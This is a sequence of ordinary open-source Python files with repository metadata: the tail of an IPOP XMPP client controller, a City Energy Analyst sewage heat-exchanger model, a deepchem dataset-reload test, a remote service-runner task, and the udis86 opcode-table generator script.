self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent con_req to {0}".format(self.uid_jid[peer_uid]))
elif (method == "con_resp"):
setup_load = "con_resp"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent con_resp to {0}".format(self.uid_jid[peer_uid]))
elif (method == "con_ack"):
setup_load = "con_ack"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent con_ack to {0}".format(self.uid_jid[peer_uid]))
elif (method == "ping_resp"):
setup_load = "ping_resp"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent ping_resp to {0}".format(self.uid_jid[peer_uid]))
elif (method == "ping"):
setup_load = "ping"+"#"+peer_uid
msg_payload = self.uid+"#"+data
self.sendMsg(peer_jid,setup_load,msg_payload)
self.log("sent ping to {0}".format(self.uid_jid[peer_uid]))
def sendXmppAdvt(self,override=False):
if (self.uid != ""):
for peer in self.xmpp_peers.keys():
send_advt = False
# True indicates that peer node does not knows my UID.
# If I have recvd more than 10 correct advertisements from peer
# reply back, may be my reply was lost.
if (self.jid_uid[peer][1] == True and self.jid_uid[peer][2]%10==0):
send_advt = True
self.jid_uid[peer][2] = 1
elif (self.jid_uid[peer][1] == True and override != True):
# Do not send an advt
send_advt = False
else:
# If here, peer does not knows my UID
send_advt = True
if (send_advt == True):
setup_load = "xmpp_advertisement"+"#"+"None"
msg_load = str(self.uid) + "#" + str(self.jid_uid[peer][0])
self.sendMsg(peer,setup_load,msg_load)
self.log("sent xmpp_advt to {0}".format(peer))
def timer_method(self):
if (self.uid == "" and self.vpn_type == "SocialVPN"):
self.log("UID not yet received- Not Ready.")
self.registerCBT('Watchdog', 'QUERY_IPOP_STATE')
return
try:
if (time.time() - self.last_sent_advt > self.advt_delay):
# see if I recvd a advertisement in this time period
# if yes than XMPP link is open
if (self.xmpp_advt_recvd == True):
self.sendXmppAdvt()
# update xmpp tracking parameters.
self.last_sent_advt = time.time()
self.xmpp_advt_recvd = False
self.advt_delay = self.INITIAL_ADVT_DELAY
# Have not heard from anyone in a while, Handles XMPP disconnection
# do not want to overwhelm with queued messages.
elif (self.advt_delay < self.MAX_ADVT_DELAY):
self.advt_delay = 2 * self.advt_delay
self.log("Delaying the XMPP advt timer \
to {0} seconds".format(self.advt_delay))
else:
# send the advertisement anyway, after MaxDelay.
self.sendXmppAdvt(override=True)
# update xmpp tracking parameters.
self.last_sent_advt = time.time()
self.xmpp_advt_recvd = False
except:
self.log("Exception in XmppClient timer")
def terminate(self):
pass
|
ipop-project/controllers
|
controller/modules/XmppClient.py
|
Python
|
mit
| 16,248
|
# -*- coding: utf-8 -*-
"""
Sewage source heat exchanger
"""
import pandas as pd
import numpy as np
import scipy
from cea.constants import HEX_WIDTH_M,VEL_FLOW_MPERS, HEAT_CAPACITY_OF_WATER_JPERKGK, H0_KWPERM2K, MIN_FLOW_LPERS, T_MIN, AT_MIN_K, P_SEWAGEWATER_KGPERM3, P_WATER_KGPERM3
import cea.config
import cea.inputlocator
__author__ = "Jimeno A. Fonseca"
__copyright__ = "Copyright 2015, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Jimeno A. Fonseca"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
def calc_sewage_heat_exchanger(locator, config):
"""
Calaculate the heat extracted from the sewage HEX.
:param locator: an InputLocator instance set to the scenario to work on
:param Length_HEX_available: HEX length available
:type Length_HEX_available: float
Save the results to `SWP.csv`
"""
# local variables
mcpwaste = []
twaste = []
mXt = []
counter = 0
names = pd.read_csv(locator.get_total_demand()).Name
sewage_water_ratio = config.sewage.sewage_water_ratio
heat_exchanger_length = config.sewage.heat_exchanger_length
V_lps_external = config.sewage.sewage_water_district
for building_name in names:
building = pd.read_csv(locator.get_demand_results_file(building_name))
mcp_combi, t_to_sewage = np.vectorize(calc_Sewagetemperature)(building.Qww_sys_kWh, building.Qww_kWh, building.Tww_sys_sup_C,
building.Tww_sys_re_C, building.mcptw_kWperC, building.mcpww_sys_kWperC, sewage_water_ratio)
mcpwaste.append(mcp_combi)
twaste.append(t_to_sewage)
mXt.append(mcp_combi*t_to_sewage)
counter = counter +1
mcpwaste_zone = np.sum(mcpwaste, axis =0)
mXt_zone = np.sum(mXt, axis =0)
twaste_zone = [x * (y**-1) * 0.8 if y != 0 else 0 for x,y in zip (mXt_zone, mcpwaste_zone)] # lossess in the grid of 20%
Q_source, t_source, t_out, tin_e, tout_e, mcpwaste_total = np.vectorize(calc_sewageheat)(mcpwaste_zone, twaste_zone, HEX_WIDTH_M,
VEL_FLOW_MPERS, H0_KWPERM2K, MIN_FLOW_LPERS,
heat_exchanger_length, T_MIN, AT_MIN_K, V_lps_external)
#save to disk
pd.DataFrame({"Qsw_kW" : Q_source, "Ts_C" : t_source, "T_out_sw_C" : t_out, "T_in_sw_C" : twaste_zone,
"mww_zone_kWperC":mcpwaste_total,
"T_out_HP_C" : tout_e, "T_in_HP_C" : tin_e}).to_csv(locator.get_sewage_heat_potential(),
index=False, float_format='%.3f')
# Calc Sewage heat
def calc_Sewagetemperature(Qwwf, Qww, tsww, trww, mcptw, mcpww, SW_ratio):
"""
Calculate sewage temperature and flow rate released from DHW usages and Fresh Water (FW) in buildings.
:param Qwwf: final DHW heat requirement
:type Qwwf: float
:param Qww: DHW heat requirement
:type Qww: float
:param tsww: DHW supply temperature
:type tsww: float
:param trww: DHW return temperature
:type trww: float
:param totwater: fresh water flow rate
:type totwater: float
:param mcpww: DHW heat capacity
:type mcpww: float
:param SW_ratio: ratio of decrease/increase in sewage water due to solids and also water intakes.
:type SW_ratio: float
:returns mcp_combi: sewage water heat capacity [kW_K]
:rtype mcp_combi: float
:returns t_to_sewage: sewage water temperature
:rtype t_to_sewage: float
"""
if Qwwf > 0:
Qloss_to_spur = Qwwf - Qww
t_spur = tsww - Qloss_to_spur / mcpww
m_DHW = mcpww * SW_ratio
m_TW = mcptw * SW_ratio
mcp_combi = m_DHW + m_TW
t_combi = ( m_DHW * t_spur + m_TW * trww ) / mcp_combi
t_to_sewage = 0.90 * t_combi # assuming 10% thermal loss throuhg piping
else:
t_to_sewage = trww
mcp_combi = mcptw * SW_ratio # in [kW_K]
return mcp_combi, t_to_sewage # in lh or kgh and in C
def calc_sewageheat(mcp_kWC_zone, tin_C, w_HEX_m, Vf_ms, h0, min_lps, L_HEX_m, tmin_C, ATmin, V_lps_external):
"""
Calculates the operation of sewage heat exchanger.
:param mcp_kWC_total: heat capacity of total sewage in a zone
:type mcp_kWC_total: float
:param tin_C: sewage inlet temperature of a zone
:type tin_C: float
:param w_HEX_m: width of the sewage HEX
:type w_HEX_m: float
:param Vf_ms: sewage flow rate [m/s]
:type Vf_ms: float
:param cp: water specific heat capacity
:type cp: float
:param h0: sewage heat transfer coefficient
:type h0: float
:param min_lps: sewage minimum flow rate in [lps]
:type min_lps: float
:param L_HEX_m: HEX length available
:type L_HEX_m: float
:param tmin_C: minimum temperature of extraction
:type tmin_C: float
:param ATmin: minimum area of heat exchange
:type ATmin: float
:returns Q_source: heat supplied by sewage
:rtype: float
:returns t_source: sewage heat supply temperature
:rtype t_source: float
:returns tb2: sewage return temperature
:rtype tbs: float
:returns ta1: temperature inlet of the cold stream (from the HP)
:rtype ta1: float
:returns ta2: temperature outlet of the cold stream (to the HP)
:rtype ta2: float
..[J.A. Fonseca et al., 2016] J.A. Fonseca, Thuy-An Nguyen, Arno Schlueter, Francois Marechal (2016). City Enegy
Analyst (CEA): Integrated framework for analysis and optimization of building energy systems in neighborhoods and
city districts. Energy and Buildings.
"""
V_lps_zone = mcp_kWC_zone/ (HEAT_CAPACITY_OF_WATER_JPERKGK / 1E3)
V_lps_total = V_lps_zone + V_lps_external
mcp_kWC_total = mcp_kWC_zone + ((V_lps_external /1000) * P_SEWAGEWATER_KGPERM3 * (HEAT_CAPACITY_OF_WATER_JPERKGK/1E3)) #kW_C
mcp_max = (Vf_ms * w_HEX_m * 0.20) * P_SEWAGEWATER_KGPERM3 * (HEAT_CAPACITY_OF_WATER_JPERKGK /1E3) # 20 cm is the depth of the active water in contact with the HEX
A_HEX = w_HEX_m * L_HEX_m # area of heat exchange
if min_lps < V_lps_total:
if mcp_kWC_total >= mcp_max:
mcp_kWC_total = mcp_max
# B is the sewage, A is the heat pump
mcpa = mcp_kWC_total * 1.1 # the flow in the heat pumps slightly above the flow on the sewage side
tb1 = tin_C
ta1 = tin_C - ((tin_C - tmin_C) + ATmin / 2)
alpha = h0 * A_HEX * (1 / mcpa - 1 / mcp_kWC_total)
n = ( 1 - scipy.exp( -alpha ) ) / (1 - mcpa / mcp_kWC_total * scipy.exp(-alpha))
tb2 = tb1 + mcpa / mcp_kWC_total * n * (ta1 - tb1)
Q_source = mcp_kWC_total * (tb1 - tb2)
ta2 = ta1 + Q_source / mcpa
t_source = ( tb2 + tb1 ) / 2
else:
tb1 = tin_C
tb2 = tin_C
ta1 = tin_C
ta2 = tin_C
Q_source = 0
t_source = tin_C
return Q_source, t_source, tb2, ta1, ta2, mcp_kWC_total
def main(config):
locator = cea.inputlocator.InputLocator(config.scenario)
calc_sewage_heat_exchanger(locator=locator, config=config)
if __name__ == '__main__':
main(cea.config.Configuration())
|
architecture-building-systems/CEAforArcGIS
|
cea/resources/sewage_heat_exchanger.py
|
Python
|
mit
| 7,301
|
"""
Testing reload.
"""
from __future__ import division
from __future__ import unicode_literals
__author__ = "Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import os
import shutil
import logging
import unittest
import tempfile
import deepchem as dc
import numpy as np
logger = logging.getLogger(__name__)
class TestReload(unittest.TestCase):
"""
Test reload for datasets.
"""
def _run_muv_experiment(self, dataset_file, reload=False):
"""Loads or reloads a small version of MUV dataset."""
# Load MUV dataset
logger.info("About to featurize compounds")
featurizer = dc.feat.CircularFingerprint(size=1024)
raw_dataset = dc.utils.save.load_from_disk(dataset_file)
MUV_tasks = [
'MUV-692', 'MUV-689', 'MUV-846', 'MUV-859', 'MUV-644', 'MUV-548',
'MUV-852', 'MUV-600', 'MUV-810', 'MUV-712', 'MUV-737', 'MUV-858',
'MUV-713', 'MUV-733', 'MUV-652', 'MUV-466', 'MUV-832'
]
loader = dc.data.CSVLoader(
tasks=MUV_tasks, smiles_field="smiles", featurizer=featurizer)
dataset = loader.featurize(dataset_file)
assert len(dataset) == len(raw_dataset)
logger.info("About to split compounds into train/valid/test")
splitter = dc.splits.ScaffoldSplitter()
frac_train, frac_valid, frac_test = .8, .1, .1
train_dataset, valid_dataset, test_dataset = \
splitter.train_valid_test_split(
dataset, log_every_n=1000, frac_train=frac_train,
frac_test=frac_test, frac_valid=frac_valid)
# Do an approximate comparison since splits are sometimes slightly off from
# the exact fraction.
assert dc.utils.evaluate.relative_difference(
len(train_dataset), frac_train * len(dataset)) < 1e-3
assert dc.utils.evaluate.relative_difference(
len(valid_dataset), frac_valid * len(dataset)) < 1e-3
assert dc.utils.evaluate.relative_difference(
len(test_dataset), frac_test * len(dataset)) < 1e-3
# TODO(rbharath): Transformers don't play nice with reload! Namely,
# reloading will cause the transform to be reapplied. This is undesirable in
# almost all cases. Need to understand a method to fix this.
transformers = [
dc.trans.BalancingTransformer(transform_w=True, dataset=train_dataset)
]
logger.info("Transforming datasets")
for dataset in [train_dataset, valid_dataset, test_dataset]:
for transformer in transformers:
dataset = transformer.transform(dataset)
return (len(train_dataset), len(valid_dataset), len(test_dataset))
def test_reload_after_gen(self):
"""Check num samples for loaded and reloaded datasets is equal."""
reload = False
current_dir = os.path.dirname(os.path.abspath(__file__))
dataset_file = os.path.join(current_dir,
"../../../datasets/mini_muv.csv.gz")
logger.info("Running experiment for first time without reload.")
(len_train, len_valid, len_test) = self._run_muv_experiment(
dataset_file, reload)
logger.info("Running experiment for second time with reload.")
reload = True
(len_reload_train, len_reload_valid,
len_reload_test) = (self._run_muv_experiment(dataset_file, reload))
assert len_train == len_reload_train
assert len_valid == len_reload_valid
assert len_test == len_reload_valid
def test_reload_twice(self):
"""Check ability to repeatedly run experiments with reload set True."""
reload = True
current_dir = os.path.dirname(os.path.abspath(__file__))
dataset_file = os.path.join(current_dir,
"../../../datasets/mini_muv.csv.gz")
logger.info("Running experiment for first time with reload.")
(len_train, len_valid, len_test) = self._run_muv_experiment(
dataset_file, reload)
logger.info("Running experiment for second time with reload.")
(len_reload_train, len_reload_valid,
len_reload_test) = (self._run_muv_experiment(dataset_file, reload))
assert len_train == len_reload_train
assert len_valid == len_reload_valid
assert len_test == len_reload_valid
|
ktaneishi/deepchem
|
deepchem/data/tests/test_reload.py
|
Python
|
mit
| 4,125
|
# (c) 2016, Hao Feng <whisperaven@gmail.com>
import logging
from .jobs import Job
from ._async import AsyncRunner
from .context import Context
from exe.executor.utils import *
from exe.utils.err import excinst
from exe.exc import ExecutorPrepareError, ExecutorNoMatchError
LOG = logging.getLogger(__name__)
class ServiceRunner(Context):
""" Manipulate service on remote host. """
__RUNNER_NAME__ = "service"
__RUNNER_MUTEX_REQUIRED__ = False
def handle(ctx, targets, name, start, restart, graceful, run_async=False):
""" Handle remote service maintain request. """
if not run_async:
return next(
ctx.executor(targets).service(name, start, restart, graceful),
None)
job = Job(targets, ctx.runner_name, ctx.runner_mutex,
dict(name=name, start=start,
restart=restart, graceful=graceful))
job.create(ctx.redis)
return job.associate_task(
_async_service.delay(job.dict_ctx, targets,
name, start, restart, graceful), ctx.redis)
@AsyncRunner.task(bind=True, ignore_result=True,
base=Context, serializer='json')
def _async_service(ctx, job_ctx, targets, name, start, restart, graceful):
job = Job.load(job_ctx)
job.bind(ctx.request.id)
try:
redis = _async_service.redis
executor = _async_service.executor(targets)
failed_targets = []
for yield_data in executor.service(name, start, restart, graceful):
target, context = decompose_exec_yielddata(yield_data)
# service returns:
# {$host -> {EXE_STATUS_ATTR -> $state (int)}
# just push these context to redis
job.push_return_data(target, context, redis)
failed = execstate_failure(extract_return_state(context))
if failed:
failed_targets.append(target)
job.target_done(target, failed, redis)
msg = None
if failed_targets:
msg = "<{0}> of <{1}> remote host(s) got service errors".format(
len(failed_targets), len(targets))
job.done(bool(failed_targets), msg, redis)
except (ExecutorPrepareError, ExecutorNoMatchError):
msg = ("got executor error while invoke service tool, "
"{0}").format(excinst())
LOG.error(msg)
job.done(failed=True, errmsg=msg, redis=redis)
except:
msg = ("got unexpected error while invoke service tool, "
"{0}").format(excinst())
LOG.error(msg)
job.done(failed=True, errmsg=msg, redis=redis)
|
whisperaven/0ops.exed
|
exe/runner/service.py
|
Python
|
mit
| 2,674
|
# udis86 - scripts/ud_itab.py
#
# Copyright (c) 2009, 2013 Vivek Thampi
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from ud_opcode import UdOpcodeTable, UdOpcodeTables, UdInsnDef
class UdItabGenerator:
OperandDict = {
"Av" : [ "OP_A" , "SZ_V" ],
"E" : [ "OP_E" , "SZ_NA" ],
"Eb" : [ "OP_E" , "SZ_B" ],
"Ew" : [ "OP_E" , "SZ_W" ],
"Ev" : [ "OP_E" , "SZ_V" ],
"Ed" : [ "OP_E" , "SZ_D" ],
"Ey" : [ "OP_E" , "SZ_Y" ],
"Eq" : [ "OP_E" , "SZ_Q" ],
"Ez" : [ "OP_E" , "SZ_Z" ],
"Fv" : [ "OP_F" , "SZ_V" ],
"G" : [ "OP_G" , "SZ_NA" ],
"Gb" : [ "OP_G" , "SZ_B" ],
"Gw" : [ "OP_G" , "SZ_W" ],
"Gv" : [ "OP_G" , "SZ_V" ],
"Gy" : [ "OP_G" , "SZ_Y" ],
"Gd" : [ "OP_G" , "SZ_D" ],
"Gq" : [ "OP_G" , "SZ_Q" ],
"Gz" : [ "OP_G" , "SZ_Z" ],
"M" : [ "OP_M" , "SZ_NA" ],
"Mb" : [ "OP_M" , "SZ_B" ],
"Mw" : [ "OP_M" , "SZ_W" ],
"Ms" : [ "OP_M" , "SZ_W" ],
"Md" : [ "OP_M" , "SZ_D" ],
"Mq" : [ "OP_M" , "SZ_Q" ],
"Mdq" : [ "OP_M" , "SZ_DQ" ],
"Mv" : [ "OP_M" , "SZ_V" ],
"Mt" : [ "OP_M" , "SZ_T" ],
"Mo" : [ "OP_M" , "SZ_O" ],
"MbRd" : [ "OP_MR" , "SZ_BD" ],
"MbRv" : [ "OP_MR" , "SZ_BV" ],
"MwRv" : [ "OP_MR" , "SZ_WV" ],
"MwRd" : [ "OP_MR" , "SZ_WD" ],
"MwRy" : [ "OP_MR" , "SZ_WY" ],
"MdRy" : [ "OP_MR" , "SZ_DY" ],
"I1" : [ "OP_I1" , "SZ_NA" ],
"I3" : [ "OP_I3" , "SZ_NA" ],
"Ib" : [ "OP_I" , "SZ_B" ],
"Iw" : [ "OP_I" , "SZ_W" ],
"Iv" : [ "OP_I" , "SZ_V" ],
"Iz" : [ "OP_I" , "SZ_Z" ],
"sIb" : [ "OP_sI" , "SZ_B" ],
"sIz" : [ "OP_sI" , "SZ_Z" ],
"sIv" : [ "OP_sI" , "SZ_V" ],
"Jv" : [ "OP_J" , "SZ_V" ],
"Jz" : [ "OP_J" , "SZ_Z" ],
"Jb" : [ "OP_J" , "SZ_B" ],
"R" : [ "OP_R" , "SZ_RDQ" ],
"C" : [ "OP_C" , "SZ_NA" ],
"D" : [ "OP_D" , "SZ_NA" ],
"S" : [ "OP_S" , "SZ_W" ],
"Ob" : [ "OP_O" , "SZ_B" ],
"Ow" : [ "OP_O" , "SZ_W" ],
"Ov" : [ "OP_O" , "SZ_V" ],
"U" : [ "OP_U" , "SZ_O" ],
"Ux" : [ "OP_U" , "SZ_X" ],
"V" : [ "OP_V" , "SZ_DQ" ],
"Vdq" : [ "OP_V" , "SZ_DQ" ],
"Vqq" : [ "OP_V" , "SZ_QQ" ],
"Vsd" : [ "OP_V" , "SZ_Q" ],
"Vx" : [ "OP_V" , "SZ_X" ],
"H" : [ "OP_H" , "SZ_X" ],
"Hx" : [ "OP_H" , "SZ_X" ],
"Hqq" : [ "OP_H" , "SZ_QQ" ],
"W" : [ "OP_W" , "SZ_DQ" ],
"Wdq" : [ "OP_W" , "SZ_DQ" ],
"Wqq" : [ "OP_W" , "SZ_QQ" ],
"Wsd" : [ "OP_W" , "SZ_Q" ],
"Wx" : [ "OP_W" , "SZ_X" ],
"L" : [ "OP_L" , "SZ_O" ],
"Lx" : [ "OP_L" , "SZ_X" ],
"MwU" : [ "OP_MU" , "SZ_WO" ],
"MdU" : [ "OP_MU" , "SZ_DO" ],
"MqU" : [ "OP_MU" , "SZ_QO" ],
"N" : [ "OP_N" , "SZ_Q" ],
"P" : [ "OP_P" , "SZ_Q" ],
"Q" : [ "OP_Q" , "SZ_Q" ],
"AL" : [ "OP_AL" , "SZ_B" ],
"AX" : [ "OP_AX" , "SZ_W" ],
"eAX" : [ "OP_eAX" , "SZ_Z" ],
"rAX" : [ "OP_rAX" , "SZ_V" ],
"CL" : [ "OP_CL" , "SZ_B" ],
"CX" : [ "OP_CX" , "SZ_W" ],
"eCX" : [ "OP_eCX" , "SZ_Z" ],
"rCX" : [ "OP_rCX" , "SZ_V" ],
"DL" : [ "OP_DL" , "SZ_B" ],
"DX" : [ "OP_DX" , "SZ_W" ],
"eDX" : [ "OP_eDX" , "SZ_Z" ],
"rDX" : [ "OP_rDX" , "SZ_V" ],
"R0b" : [ "OP_R0" , "SZ_B" ],
"R1b" : [ "OP_R1" , "SZ_B" ],
"R2b" : [ "OP_R2" , "SZ_B" ],
"R3b" : [ "OP_R3" , "SZ_B" ],
"R4b" : [ "OP_R4" , "SZ_B" ],
"R5b" : [ "OP_R5" , "SZ_B" ],
"R6b" : [ "OP_R6" , "SZ_B" ],
"R7b" : [ "OP_R7" , "SZ_B" ],
"R0w" : [ "OP_R0" , "SZ_W" ],
"R1w" : [ "OP_R1" , "SZ_W" ],
"R2w" : [ "OP_R2" , "SZ_W" ],
"R3w" : [ "OP_R3" , "SZ_W" ],
"R4w" : [ "OP_R4" , "SZ_W" ],
"R5w" : [ "OP_R5" , "SZ_W" ],
"R6w" : [ "OP_R6" , "SZ_W" ],
"R7w" : [ "OP_R7" , "SZ_W" ],
"R0v" : [ "OP_R0" , "SZ_V" ],
"R1v" : [ "OP_R1" , "SZ_V" ],
"R2v" : [ "OP_R2" , "SZ_V" ],
"R3v" : [ "OP_R3" , "SZ_V" ],
"R4v" : [ "OP_R4" , "SZ_V" ],
"R5v" : [ "OP_R5" , "SZ_V" ],
"R6v" : [ "OP_R6" , "SZ_V" ],
"R7v" : [ "OP_R7" , "SZ_V" ],
"R0z" : [ "OP_R0" , "SZ_Z" ],
"R1z" : [ "OP_R1" , "SZ_Z" ],
"R2z" : [ "OP_R2" , "SZ_Z" ],
"R3z" : [ "OP_R3" , "SZ_Z" ],
"R4z" : [ "OP_R4" , "SZ_Z" ],
"R5z" : [ "OP_R5" , "SZ_Z" ],
"R6z" : [ "OP_R6" , "SZ_Z" ],
"R7z" : [ "OP_R7" , "SZ_Z" ],
"R0y" : [ "OP_R0" , "SZ_Y" ],
"R1y" : [ "OP_R1" , "SZ_Y" ],
"R2y" : [ "OP_R2" , "SZ_Y" ],
"R3y" : [ "OP_R3" , "SZ_Y" ],
"R4y" : [ "OP_R4" , "SZ_Y" ],
"R5y" : [ "OP_R5" , "SZ_Y" ],
"R6y" : [ "OP_R6" , "SZ_Y" ],
"R7y" : [ "OP_R7" , "SZ_Y" ],
"ES" : [ "OP_ES" , "SZ_NA" ],
"CS" : [ "OP_CS" , "SZ_NA" ],
"DS" : [ "OP_DS" , "SZ_NA" ],
"SS" : [ "OP_SS" , "SZ_NA" ],
"GS" : [ "OP_GS" , "SZ_NA" ],
"FS" : [ "OP_FS" , "SZ_NA" ],
"ST0" : [ "OP_ST0" , "SZ_NA" ],
"ST1" : [ "OP_ST1" , "SZ_NA" ],
"ST2" : [ "OP_ST2" , "SZ_NA" ],
"ST3" : [ "OP_ST3" , "SZ_NA" ],
"ST4" : [ "OP_ST4" , "SZ_NA" ],
"ST5" : [ "OP_ST5" , "SZ_NA" ],
"ST6" : [ "OP_ST6" , "SZ_NA" ],
"ST7" : [ "OP_ST7" , "SZ_NA" ],
"NONE" : [ "OP_NONE" , "SZ_NA" ],
}
#
# opcode prefix dictionary
#
PrefixDict = {
"rep" : "P_str",
"repz" : "P_strz",
"aso" : "P_aso",
"oso" : "P_oso",
"rexw" : "P_rexw",
"rexb" : "P_rexb",
"rexx" : "P_rexx",
"rexr" : "P_rexr",
"vexl" : "P_vexl",
"vexw" : "P_vexw",
"seg" : "P_seg",
"inv64" : "P_inv64",
"def64" : "P_def64",
"cast" : "P_cast",
}
MnemonicAliases = ( "invalid", "3dnow", "none", "db", "pause" )
def __init__(self, tables):
self.tables = tables
self._insnIndexMap, i = {}, 0
for insn in tables.getInsnList():
self._insnIndexMap[insn], i = i, i + 1
self._tableIndexMap, i = {}, 0
for table in tables.getTableList():
self._tableIndexMap[table], i = i, i + 1
def getInsnIndex(self, insn):
assert isinstance(insn, UdInsnDef)
return self._insnIndexMap[insn]
def getTableIndex(self, table):
assert isinstance(table, UdOpcodeTable)
return self._tableIndexMap[table]
def getTableName(self, table):
return "ud_itab__%d" % self.getTableIndex(table)
def genOpcodeTable(self, table, isGlobal=False):
"""Emit Opcode Table in C.
"""
self.ItabC.write( "\n" );
if not isGlobal:
self.ItabC.write('static ')
self.ItabC.write( "const uint16_t %s[] = {\n" % self.getTableName(table))
for i in range(table.size()):
if i > 0 and i % 4 == 0:
self.ItabC.write( "\n" )
if i % 4 == 0:
self.ItabC.write( " /* %2x */" % i)
e = table.entryAt(i)
if e is None:
self.ItabC.write("%12s," % "INVALID")
elif isinstance(e, UdOpcodeTable):
self.ItabC.write("%12s," % ("GROUP(%d)" % self.getTableIndex(e)))
elif isinstance(e, UdInsnDef):
self.ItabC.write("%12s," % self.getInsnIndex(e))
self.ItabC.write( "\n" )
self.ItabC.write( "};\n" )
def genOpcodeTables(self):
tables = self.tables.getTableList()
for table in tables:
self.genOpcodeTable(table, table is self.tables.root)
def genOpcodeTablesLookupIndex(self):
self.ItabC.write( "\n\n" );
self.ItabC.write( "struct ud_lookup_table_list_entry ud_lookup_table_list[] = {\n" )
for table in self.tables.getTableList():
f0 = self.getTableName(table) + ","
f1 = table.label() + ","
f2 = "\"%s\"" % table.meta()
self.ItabC.write(" /* %03d */ { %s %s %s },\n" %
(self.getTableIndex(table), f0, f1, f2))
self.ItabC.write( "};" )
def genInsnTable( self ):
self.ItabC.write( "struct ud_itab_entry ud_itab[] = {\n" );
for insn in self.tables.getInsnList():
opr_c = [ "O_NONE", "O_NONE", "O_NONE", "O_NONE" ]
pfx_c = []
opr = insn.operands
for i in range(len(opr)):
if not (opr[i] in self.OperandDict.keys()):
print("error: invalid operand declaration: %s\n" % opr[i])
opr_c[i] = "O_" + opr[i]
opr = "%s %s %s %s" % (opr_c[0] + ",", opr_c[1] + ",",
opr_c[2] + ",", opr_c[3])
for p in insn.prefixes:
if not ( p in self.PrefixDict.keys() ):
print("error: invalid prefix specification: %s \n" % pfx)
pfx_c.append( self.PrefixDict[p] )
if len(insn.prefixes) == 0:
pfx_c.append( "P_none" )
pfx = "|".join( pfx_c )
self.ItabC.write( " /* %04d */ { UD_I%s %s, %s },\n" \
% ( self.getInsnIndex(insn), insn.mnemonic + ',', opr, pfx ) )
self.ItabC.write( "};\n" )
def getMnemonicsList(self):
mnemonics = self.tables.getMnemonicsList()
mnemonics.extend(self.MnemonicAliases)
return mnemonics
def genMnemonicsList(self):
mnemonics = self.getMnemonicsList()
self.ItabC.write( "\n\n" );
self.ItabC.write( "const char* ud_mnemonics_str[] = {\n " )
self.ItabC.write( ",\n ".join( [ "\"%s\"" % m for m in mnemonics ] ) )
self.ItabC.write( "\n};\n" )
def genItabH( self, filePath ):
self.ItabH = open( filePath, "w" )
# Generate Table Type Enumeration
self.ItabH.write( "#ifndef UD_ITAB_H\n" )
self.ItabH.write( "#define UD_ITAB_H\n\n" )
self.ItabH.write("/* itab.h -- generated by udis86:scripts/ud_itab.py, do no edit */\n\n")
# table type enumeration
self.ItabH.write( "/* ud_table_type -- lookup table types (see decode.c) */\n" )
self.ItabH.write( "enum ud_table_type {\n " )
enum = UdOpcodeTable.getLabels()
self.ItabH.write( ",\n ".join( enum ) )
self.ItabH.write( "\n};\n\n" );
# mnemonic enumeration
self.ItabH.write( "/* ud_mnemonic -- mnemonic constants */\n" )
enum = "enum ud_mnemonic_code {\n "
enum += ",\n ".join( [ "UD_I%s" % m for m in self.getMnemonicsList() ] )
enum += ",\n UD_MAX_MNEMONIC_CODE"
enum += "\n} UD_ATTR_PACKED;\n"
self.ItabH.write( enum )
self.ItabH.write( "\n" )
self.ItabH.write( "extern const char * ud_mnemonics_str[];\n" )
self.ItabH.write( "\n#endif /* UD_ITAB_H */\n" )
self.ItabH.close()
def genItabC(self, filePath):
self.ItabC = open(filePath, "w")
self.ItabC.write("/* itab.c -- generated by udis86:scripts/ud_itab.py, do no edit")
self.ItabC.write(" */\n");
self.ItabC.write("#include \"decode.h\"\n\n");
self.ItabC.write("#define GROUP(n) (0x8000 | (n))\n")
self.ItabC.write("#define INVALID %d\n\n" % self.getInsnIndex(self.tables.invalidInsn))
self.genOpcodeTables()
self.genOpcodeTablesLookupIndex()
#
# Macros defining short-names for operands
#
self.ItabC.write("\n\n/* itab entry operand definitions (for readability) */\n");
operands = self.OperandDict.keys()
operands = sorted(operands)
for o in operands:
self.ItabC.write("#define O_%-7s { %-12s %-8s }\n" %
(o, self.OperandDict[o][0] + ",", self.OperandDict[o][1]));
self.ItabC.write("\n");
self.genInsnTable()
self.genMnemonicsList()
self.ItabC.close()
def genItab( self, location ):
self.genItabC(os.path.join(location, "itab.c"))
self.genItabH(os.path.join(location, "itab.h"))
def usage():
print("usage: ud_itab.py <optable.xml> <output-path>")
def main():
if len(sys.argv) != 3:
usage()
sys.exit(1)
tables = UdOpcodeTables(xml=sys.argv[1])
itab = UdItabGenerator(tables)
itab.genItab(sys.argv[2])
if __name__ == '__main__':
main()
|
lvous/hadesmem
|
src/udis86/udis86/scripts/ud_itab.py
|
Python
|
mit
| 16,682
|
# -*- coding: utf-8 -*-
